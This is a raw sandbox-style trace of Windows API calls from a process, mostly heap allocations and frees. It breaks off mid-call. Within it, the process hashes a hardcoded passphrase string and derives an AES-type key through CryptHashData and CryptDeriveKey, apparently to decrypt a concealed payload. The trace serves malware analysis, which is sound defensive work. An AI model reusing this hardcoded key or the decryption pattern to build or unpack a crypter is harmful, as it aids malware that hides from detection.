CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b48 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0076.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2c08 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.644] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0076.644] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca8f8 [0076.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.647] CryptHashData (hHash=0x41ac040, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0076.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0076.649] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0076.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0076.649] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0076.650] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.650] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.650] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac540) returned 1 [0076.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, 